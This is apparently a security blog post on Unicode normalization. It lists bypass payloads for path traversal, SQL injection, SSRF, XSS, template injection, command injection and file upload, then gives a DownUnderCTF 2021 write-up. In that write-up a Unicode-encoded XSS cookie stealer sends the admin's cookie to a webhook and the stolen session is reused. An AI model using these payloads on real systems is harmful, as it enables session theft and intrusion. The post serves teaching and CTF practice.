What is Unicode?

Unicode or formally Unicode Standard is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world’s writing systems.


For example, “A” is mapped to U+0041, and “a” is mapped to U+0061. Unicode characters exist from U+000000 to U+10FFFF (there are more than a million symbols). Unicode divides all these possible symbols into “planes”, the best known is the BMP (Basic Multilingual Plane) that goes from U+0000 to U+FFFF (it is the Unicode plane number 1, there are 16 more, called “astral planes”).

The Unicode characters of the so-called “astral” planes can also be represented as “surrogate pairs” in UTF-16. Read more

Unicode equivalence

Unicode equivalence or Unicode normalization is the specification by the Unicode character encoding standard that some sequences of code points represent essentially the same character. On a more technical level, normalization ensures two strings that may use a different binary representation for their characters have the same binary value after normalization.

Canonical Equivalence

Canonical equivalent characters are assumed to have the same appearance and meaning when printed or displayed.

Compatibility Equivalence

Compatibility equivalence is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently.

Normalization algorithms

There are 4 Normalization algorithms defined by the Unicode standard; NFC, NFD, NFKD and NFKC, each applies Canonical and Compatibility normalization techniques in a different way. You can read more on the different techniques at unicode.org.

  • NFC: Normalization Form Canonical Composition
  • NFD: Normalization Form Canonical Decomposition
  • NFKC: Normalization Form Compatibility Composition
  • NFKD: Normalization Form Compatibility Decomposition

The general idea behind all of these algorithms is to “normalize” some code points to end up having the same character.

What is the impact?

What can we, as attackers do with Unicode?

Path traversal

Character Payload After Normalization
‥ (U+2025) ‥/‥/‥/etc/passwd ../../../etc/passwd
︰(U+FE30) ︰/︰/︰/etc/passwd ../../../etc/passwd

SQL Injection

Character Payload After Normalization
'(U+FF07) ' or '1'='1 ’ or ‘1’=’1
"(U+FF02) " or "1"="1 ” or “1”=”1
﹣ (U+FE63) admin'﹣﹣ admin’–

Server-Side Request Forgery - SSRF

Character Payload After Normalization
⓪ (U+24EA) ①②⑦.⓪.⓪.①

Open Redirect

Character Payload After Normalization
。(U+3002) lazarv。com lazarv.com
/(U+FF0F) //lazarv.com //lazarv.com

Cross Site Scripting - XSS

Character Payload After Normalization
<(U+FF1C) <script src=a/> <script src=a/>
"(U+FF02) "onclick='prompt(1)' “onclick=’prompt(1)’

Template Injection - SSTI and CSTI

Character Payload After Normalization
﹛(U+FE5B) ﹛﹛3+3﹜﹜ {{3+3}}
[ (U+FF3B) [[5+5]] [[5+5]]

OS Command Injection

Character Payload After Normalization
& (U+FF06) &&whoami &&whoami
| (U+FF5C) || whoami

  • Arbitrary file upload
Character Payload After Normalization
p (U+FF50) ʰ (U+02B0) shell.pʰp shell.php

Chain reaction writeup from DownUnderCTF 2021

Upon visiting the main page, we see an option to register or login:

Register whatever account and login:

After logging in, we are presented with the option to visit our profile in the upper right corner of the page:

On our profile page, we’re able to update our username and “About me” text with the ability to report the current page to admin:

This might be an opportunity to XSS the page, but after inserting <script>alert(1)</script> I get redirected to this page:

At this point, we know that some kind of input sanitization or character black listing is being performed. After trial and error, I decided to try encoding blacklisted characters with Unicode equivalents. Unicode Normalization reference table

I intercepted the update information request in Burp Suite and successfully broke out of HTML by injecting ""> test in Unicode format and escaped from the HTML:

username=lazar&aboutme=%ef%bc%82%ef%bc%82%ef%b9%a5 test

This means that I can inject a simple cookie stealer which will send me the cookie in base64 and enable me to log in as the admin when he reviews the reported page. I injected the following JavaScript PoC:

%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 var i = new Image(); i.src='https://webhook.site/MYID?' %2b btoa(document.cookie)  %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5

Which translates to:

Here I am creating a new image element and setting its src attribute to point to an online webhook link I created and appending user’s cookie, using document.cookie function and encoding it to base64 using btoa native javascript function.

Note that script keyword is blacklisted and I had to replace p with Unicode equivalent.

After pressing “Report Error” button on the page, my webhook came with appended base64 value:

Decoding base64 we get admin-cookie value:

I applied the cookie to my current session by opening developer tools and executing the following:

document.cookie = "admin-cookie=COOKIE_VALUE"

Now we are able to access /admin endpoint which holds the flag: